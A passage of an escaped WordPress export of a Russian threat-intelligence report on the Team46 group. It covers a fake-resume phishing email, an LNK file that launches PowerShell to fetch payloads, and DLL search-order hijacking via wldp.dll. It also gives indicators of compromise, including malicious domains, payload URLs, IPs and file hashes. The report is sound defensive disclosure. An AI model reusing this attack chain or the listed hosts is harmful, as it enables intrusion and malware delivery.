width=\"230\">\n<p align=\"center\"><strong>Defense Evasion<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1574.001<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Hijack Execution Flow: DLL Search Order Hijacking    <\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0414\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 Team46 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u043f\u043e\u0434\u043c\u0435\u043d\u0443 wldp.dll \u0432 \u043f\u0430\u043f\u043a\u0435 \u0441 \u042f\u043d\u0434\u0435\u043a\u0441 \u0411\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u043c, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e \u043e\u0431\u043e\u0439\u0442\u0438 \u043f\u0435\u0441\u043e\u0447\u043d\u0438\u0446\u0443 <\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<h2>IOCs<\/h2>\n<h3>\u0424\u0430\u0439\u043b\u043e\u0432\u044b\u0435 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b<\/h3>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"center\"><strong>\u0418\u043c\u044f \u0444\u0430\u0439\u043b\u0430<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"center\"><strong>MD5<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"center\"><strong>SHA1<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"center\"><strong>SHA256<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Job Application_20240268.rar<\/p>\n<\/td>\n<td>\n<p align=\"left\">8fedb5dae41ad563f2276b90930aa341<\/p>\n<\/td>\n<td>\n<p align=\"left\">a35a21776eb16ed904ba09dd76a5f6dddd7aee98<\/p>\n<\/td>\n<td>\n<p align=\"left\">c801243a2e14b64ed1d87feef9ce6298d90d72eb2bbff3994d868424c2a2346c<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Job Application.pdf.lnk<\/p>\n<\/td>\n<td>\n<p align=\"left\">c0df1e743bcc016245de4731fb7220b9<\/p>\n<\/td>\n<td>\n<p align=\"left\">e59284d6677ede89d525491956258d29cd83c59f<\/p>\n<\/td>\n<td>\n<p align=\"left\">823d625481fe8b0299850e9758e43b717b6874d42e0112f1b8281bcefedadd31<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">7952235986937661.rar <\/p>\n<\/td>\n<td>\n<p align=\"left\">be930ec5fe56fce7abca7df85cb8fecb <\/p>\n<\/td>\n<td>\n<p align=\"left\">61b99ca03d7f2d19279e53a9e53b31eec49f5bc0 <\/p>\n<\/td>\n<td>\n<p align=\"left\">c101e1f8b4bb6b498ab99a4cf7fd9e62a4126be16409effa379c4f78194b5707   <\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">ps1<\/p>\n<\/td>\n<td>\n<p align=\"left\">760550ef574cc8f660314a3bf7c21a9d<\/p>\n<\/td>\n<td>\n<p align=\"left\">dca725b40e8f5ba28cd78d285c0e6c77f6b96996<\/p>\n<\/td>\n<td>\n<p align=\"left\">c5578c44bb56edc97c0ee974a90912716217c39449649be6755ba9417ecb7e73<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">scan_3824.pdf<\/p>\n<\/td>\n<td>\n<p align=\"left\">92c0e50193bfc15d29128d41e689625b<\/p>\n<\/td>\n<td>\n<p align=\"left\">e4592319b8c7ed0c6859eac490f52a428b26410b<\/p>\n<\/td>\n<td>\n<p align=\"left\">62248642faaf84400a23b14c50fdf2ea37ece82262fd344963fbd57bd49973c7<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Job application.pdf<\/p>\n<\/td>\n<td>\n<p align=\"left\">9ab5785378bf723844a0eea7f42a5084<\/p>\n<\/td>\n<td>\n<p align=\"left\">d77657f52745b3b9331dd55a431a59ac135cac64<\/p>\n<\/td>\n<td>\n<p align=\"left\">e92ad395f945596ff4e1afaf852119046f663285e4a79792c4db2cf97a2a8f61<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<h3>\u0421\u0435\u0442\u0435\u0432\u044b\u0435 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b<\/h3>\n<p><code>rabotnik.today<\/code><\/p>\n<p><code>infosecteam.info<\/code><\/p>\n<p><code>cybers46.team<\/code><\/p>\n<p><code>cybers4646.my.id<\/code><\/p>\n<p><code>srv480138.hstgr.cloud<\/code><\/p>\n<p><code>162.0.236.151<\/code><\/p>\n<p><code>203.161.60.229<\/code><\/p>\n<p><code>149.100.138.167<\/code><\/p>\n<div class=\"persona\"><img class=\"image persona__image\"\/><\/p>\n<h5 class=\"persona__heading\">\u0421\u0442\u0430\u043d\u0438\u0441\u043b\u0430\u0432 \u041f\u044b\u0436\u043e\u0432<\/h5>\n<p>\u0421\u0442\u0430\u0440\u0448\u0438\u0439 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442 \u0433\u0440\u0443\u043f\u043f\u044b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u043b\u043e\u0436\u043d\u044b\u0445 \u0443\u0433\u0440\u043e\u0437 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043d\u043e\u0433\u043e \u0446\u0435\u043d\u0442\u0440\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Positive Technologies<\/p>\n<\/div>\n<div class=\"persona\"><img class=\"image persona__image\"\/><\/p>\n<h5 class=\"persona__heading\">\u0414\u0435\u043d\u0438\u0441 \u041a\u0443\u0432\u0448\u0438\u043d\u043e\u0432<\/h5>\n<p>\u0420\u0443\u043a\u043e\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430 Threat Intelligence \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043d\u043e\u0433\u043e \u0446\u0435\u043d\u0442\u0440\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Positive Technologies<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p><!----><!----><\/div>\n<p><!----><!----><br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/articles\/841176\/\"> https:\/\/habr.com\/ru\/articles\/841176\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<div><!--[--><!--]--><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"full-width\"><\/figure>\n<p>\u0427\u0435\u0442\u0432\u0435\u0440\u0442\u043e\u0433\u043e \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u00ab\u0414\u043e\u043a\u0442\u043e\u0440 \u0412\u0435\u0431\u00bb \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 <a href=\"https:\/\/news.drweb.ru\/show\/?i=14899&amp;c=5&amp;lng=ru\">\u043e\u0442\u0447\u0435\u0442<\/a> \u043e \u043d\u0435\u0441\u043e\u0441\u0442\u043e\u044f\u0432\u0448\u0435\u0439\u0441\u044f \u0430\u0442\u0430\u043a\u0435 \u043d\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0433\u043e \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0430 \u0433\u0440\u0443\u0437\u043e\u0432\u044b\u0445 \u0436.\/\u0434. \u043f\u0435\u0440\u0435\u0432\u043e\u0437\u043e\u043a. <\/p>\n<p>\u041d\u0430\u043c \u0445\u043e\u0442\u0435\u043b\u043e\u0441\u044c \u0431\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432 \u044d\u0442\u043e\u0442 \u043e\u0442\u0447\u0435\u0442 \u043d\u0430\u0448\u0438 \u043d\u0430\u0445\u043e\u0434\u043a\u0438 \u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0434\u0440\u0443\u0433\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445. \u041c\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 \u0433\u0440\u0443\u043f\u043f\u0443 Team46, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0432 \u0441\u0432\u043e\u0435\u0439 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0434\u043e\u043c\u0435\u043d <code>cybers46.team<\/code>.<\/p>\n<h2>\u041f\u0435\u0440\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430<\/h2>\n<p>\u0412 \u043a\u043e\u043d\u0446\u0435 \u0444\u0435\u0432\u0440\u0430\u043b\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 <a href=\"https:\/\/t.me\/ptescalator\">Threat Intelligence \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043d\u043e\u0433\u043e \u0446\u0435\u043d\u0442\u0440\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Positive Technologies<\/a> \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043f\u0438\u0441\u044c\u043c\u043e \u0441 \u0442\u0435\u043c\u043e\u0439 <code>Re: \u0424\u0440\u043e\u043d\u0442\u0435\u043d\u0434-\u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a<\/code>. \u041e\u043d\u043e \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0441 \u0430\u0434\u0440\u0435\u0441\u0430 <code>jobs@rabotnik.today<\/code> \u0438 \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043f\u043e\u0434 \u0440\u0435\u0437\u044e\u043c\u0435 \u0444\u0440\u043e\u043d\u0442\u0435\u043d\u0434-\u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430.<\/p>\n<figure class=\"full-width\"><\/figure>\n<p>\u0421\u0440\u0430\u0437\u0443 \u0431\u0440\u043e\u0441\u0430\u0435\u0442\u0441\u044f \u0432 \u0433\u043b\u0430\u0437\u0430 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430\u0443\u0433\u0430\u0434 \u043d\u043e\u043c\u0435\u0440 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430 \u0432 \u043f\u043e\u0434\u043f\u0438\u0441\u0438. \u041a \u043f\u0438\u0441\u044c\u043c\u0443 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d \u0437\u0430\u043f\u0430\u0440\u043e\u043b\u0435\u043d\u043d\u044b\u0439 \u0430\u0440\u0445\u0438\u0432 <code>Job Application_20240268.rar<\/code>, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0444\u0430\u0439\u043b <code>Job Application.pdf.lnk<\/code>, \u043f\u0430\u0440\u043e\u043b\u044c \u043e\u0442 \u0430\u0440\u0445\u0438\u0432\u0430 (\u0418\u043d\u043d\u0430) \u0443\u043a\u0430\u0437\u0430\u043d \u0432 \u0442\u0435\u043a\u0441\u0442\u0435 \u043f\u0438\u0441\u044c\u043c\u0430. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0432 \u043f\u0438\u0441\u044c\u043c\u0435 \u0435\u0441\u0442\u044c \u0441\u0441\u044b\u043b\u043a\u0430 <code>rabotnik.today\/resume\/7952235986937661.rar<\/code>, \u043f\u043e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0430\u0440\u0445\u0438\u0432 \u0443\u0436\u0435 \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0442\u043e\u0442 \u0436\u0435 \u0441\u0430\u043c\u044b\u0439 \u044f\u0440\u043b\u044b\u043a. \u0418\u0437 \u044f\u0440\u043b\u044b\u043a\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f PowerShell-\u0441\u043a\u0440\u0438\u043f\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0434\u0440\u0443\u0433\u043e\u0439 PowerShell-\u0441\u043a\u0440\u0438\u043f\u0442 \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 <code>infosecteam.info\/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu (c5578c44bb56edc97c0ee974a90912716217c39449649be6755ba9417ecb7e73)<\/code>, \u0430 \u0442\u043e\u0442 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0443 \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 <code>infosecteam.info\/Job%20application.pdf<\/code> \u0438 \u043e\u0441\u043d\u043e\u0432\u043d\u0443\u044e \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 <code>infosecteam.info\/base.php<\/code>, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043d\u0430\u043c \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c, \u043d\u043e \u043e\u043d\u0430 \u0431\u044b\u043b\u0430 \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u00ab\u0414\u043e\u043a\u0442\u043e\u0440 \u0412\u0435\u0431\u00bb.<\/p>\n<p>\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0430 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u0440\u0435\u0437\u044e\u043c\u0435 \u043d\u0435\u043a\u043e\u0439 \u041a\u043b\u0435\u0431\u043b\u0435\u0446 \u0418\u043d\u043d\u044b \u0424\u0435\u0434\u043e\u0440\u043e\u0432\u043d\u044b. <\/p>\n<figure class=\"full-width\"><\/figure>\n<p>\u0420\u0435\u0437\u044e\u043c\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0444\u0430\u043a\u0442\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043e\u0448\u0438\u0431\u043e\u043a. \u041f\u0438\u0441\u044c\u043c\u043e \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0432 \u043a\u043e\u043d\u0446\u0435 \u0444\u0435\u0432\u0440\u0430\u043b\u044f 2024 \u0433\u043e\u0434\u0430, \u0430 \u0434\u0430\u0442\u0430 \u0440\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u2014 10 \u043c\u0430\u0440\u0442\u0430 1994 \u0433\u043e\u0434\u0430, \u0442\u043e \u0435\u0441\u0442\u044c \u0434\u043e\u043b\u0436\u043d\u043e \u0431\u044b\u0442\u044c \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043e 29 \u043b\u0435\u0442, \u0430 \u043d\u0435 30. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0444\u0430\u043c\u0438\u043b\u0438\u0438 \u041a\u043b\u0435\u0431\u043b\u0435\u0446 <span class=\"habrahidden\">\u043d\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0435<\/span>.<\/p>\n<p>\u0418\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0432 \u0440\u0435\u0437\u044e\u043c\u0435 \u0431\u044b\u043b \u0443\u043a\u0430\u0437\u0430\u043d \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0430\u0434\u0440\u0435\u0441 <code>8067282501@mail.ru<\/code>, \u0430 \u043f\u043e\u0441\u043b\u0435 \u0438\u0437\u043c\u0435\u043d\u0435\u043d \u043d\u0430 <code>inna.kleblets@mail.ru<\/code>. \u0412\u0441\u0435 \u044d\u0442\u043e, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0444\u0430\u0439\u043b \u0431\u044b\u043b \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d \u0441 \u0441\u0430\u0439\u0442\u0430 hh.ru \u0438 \u043e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d \u0432 LibreOffice Writer 7.3 7 \u0444\u0435\u0432\u0440\u0430\u043b\u044f 2024 \u0432 02:00:00 UTC-05:00, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u044f\u0437\u044b\u043a\u0430 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 LibreOffice Writer \u0431\u044b\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d en-US.<\/p>\n<p>\u041e\u0442\u043b\u0438\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c\u044e \u044d\u0442\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0442\u043e, \u0447\u0442\u043e \u0432\u0441\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0435 \u0434\u043e\u043c\u0435\u043d\u044b \u0438\u043c\u0435\u044e\u0442 \u0437\u0430\u0433\u043b\u0443\u0448\u043a\u0438, \u0441\u043e\u0437\u0434\u0430\u044e\u0449\u0438\u0435 \u0432\u0438\u0434 \u0435\u0433\u043e \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0441\u0442\u0438. \u0422\u0430\u043a, \u0434\u043e\u043c\u0435\u043d <code>infosecteam.info<\/code> \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0438\u0442 \u044f\u043a\u043e\u0431\u044b \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 InfoSecTeam. <\/p>\n<figure class=\"full-width\"><\/figure>\n<p>\u042d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0444\u0430\u0439\u043b \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0435 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u043e\u0439, \u0430 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u043e\u043c. \u0421\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u0441\u0430\u0439\u0442\u0430 \u044f\u0432\u043d\u043e \u0438\u043c\u0435\u044e\u0442 \u043c\u0430\u0448\u0438\u043d\u043d\u044b\u0439 \u043f\u0435\u0440\u0435\u0432\u043e\u0434. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0432 \u0444\u0443\u0442\u0435\u0440\u0435 \u0441\u0430\u0439\u0442\u0430 \u0435\u0441\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0430 \u0432 \u0430\u0434\u0440\u0435\u0441\u0435, \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0443\u043a\u0430\u0437\u0430\u043d\u0438\u0435 \u0434\u043e\u043c\u0430.<\/p>\n<figure class=\"full-width\"><\/figure>\n<p>\u0428\u0430\u0431\u043b\u043e\u043d \u0441\u0430\u0439\u0442\u0430 \u0432\u0437\u044f\u0442 \u0438\u0437 \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 \u0448\u0430\u0431\u043b\u043e\u043d\u043e\u0432 \u0434\u043b\u044f WordPress.<\/p>\n<figure class=\"full-width\"><\/figure>\n<p>\u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u0447\u0442\u043e \u043f\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u043f\u043e\u0438\u0441\u043a\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0432 Google \u043f\u0435\u0440\u0432\u044b\u0435 \u0434\u0432\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u0430\u0439\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0430 \u0440\u0435\u0430\u043b\u044c\u043d\u0430\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0438\u0437 \u0412\u0435\u043b\u0438\u043a\u043e\u0431\u0440\u0438\u0442\u0430\u043d\u0438\u0438, \u0438\u043c\u0435\u044e\u0449\u0430\u044f \u0442\u043e \u0436\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435, \u2014 \u043b\u0438\u0448\u044c \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u0443\u044e.<\/p>\n<figure class=\"full-width\"><\/figure>\n<p>\u0410\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u0430\u044f \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u0442\u0441\u044f \u0438 \u043f\u0440\u0438 \u043f\u043e\u0438\u0441\u043a\u0435 \u0432 \u042f\u043d\u0434\u0435\u043a\u0441\u0435.<\/p>\n<figure class=\"full-width\"><\/figure>\n<p>\u0414\u043e\u043c\u0435\u043d <code>rabotnik.today<\/code> \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u0437\u0430\u0433\u043b\u0443\u0448\u043a\u0443.<\/p>\n<figure class=\"full-width\"><\/figure>\n<p>\u0423 \u0441\u0430\u0439\u0442\u0430 \u0435\u0441\u0442\u044c \u0440\u0443\u0441\u0441\u043a\u043e\u044f\u0437\u044b\u0447\u043d\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043c\u0430\u0448\u0438\u043d\u043d\u044b\u0439 \u043f\u0435\u0440\u0435\u0432\u043e\u0434.<\/p>\n<figure class=\"full-width\"><\/figure>\n<p>\u0412 \u0430\u0442\u0430\u043a\u0435 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u044b \u0434\u0432\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 \u2014 <code>rabotnik.today<\/code> \u0438 <code>infosecteam.info<\/code>, \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 08.12.2023 \u0438 19.02.2024 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e. \u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e, \u0431\u044b\u043b\u0438 \u043d\u0430\u0439\u0434\u0435\u043d\u044b \u0435\u0449\u0435 \u0434\u0432\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 \u2014 <code>cybers46.team<\/code> \u0438 <code>cybers4646.my.id<\/code>, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b 05.06.2023 \u0438 03.06.2023 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0438 \u0442\u0430\u043a \u0436\u0435 \u0440\u0435\u0437\u043e\u043b\u0432\u0438\u043b\u0438\u0441\u044c \u0432 162.0.236.151, \u043a\u0430\u043a \u0438 <code>infosecteam.info<\/code>. \u041f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u043e\u043d\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0434\u043b\u044f \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u0430\u0442\u0430\u043a\u0438, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u0430 \u0430\u0442\u0430\u043a\u0430 \u043d\u0435 \u043f\u0435\u0440\u0432\u0430\u044f. \u041f\u043e \u0434\u043e\u043c\u0435\u043d\u0443 <code>cybers46.team<\/code> \u043c\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0443\u044e \u0433\u0440\u0443\u043f\u043f\u0443 Team46.<\/p>\n<p>\u0421\u0430\u043c\u0430 \u0430\u0442\u0430\u043a\u0430 \u043d\u043e\u0441\u0438\u043b\u0430 \u044f\u0432\u043d\u043e \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440: \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043f\u043e\u0447\u0442\u0438 4000 \u043e\u0434\u0438\u043d\u0430\u043a\u043e\u0432\u044b\u0445 \u044f\u0440\u043b\u044b\u043a\u043e\u0432 (\u043d\u043e \u0441 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430\u043c\u0438 \u0436\u0435\u0440\u0442\u0432) \u0432 \u0430\u0440\u0445\u0438\u0432\u0430\u0445 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u043f\u0430\u043f\u043a\u0430\u0445 \u043d\u0430 <code>infosecteam.info<\/code>, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0442\u0443\u0434\u0430 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0442\u0440\u0435\u0445 \u043c\u0438\u043d\u0443\u0442.<\/p>\n<figure class=\"full-width\"><\/figure>\n<p>\u041f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438 \u043f\u0440\u0438 \u043f\u043e\u0438\u0441\u043a\u0435 \u0432 \u042f\u043d\u0434\u0435\u043a\u0441\u0435 \u0442\u043e\u0436\u0435 \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e 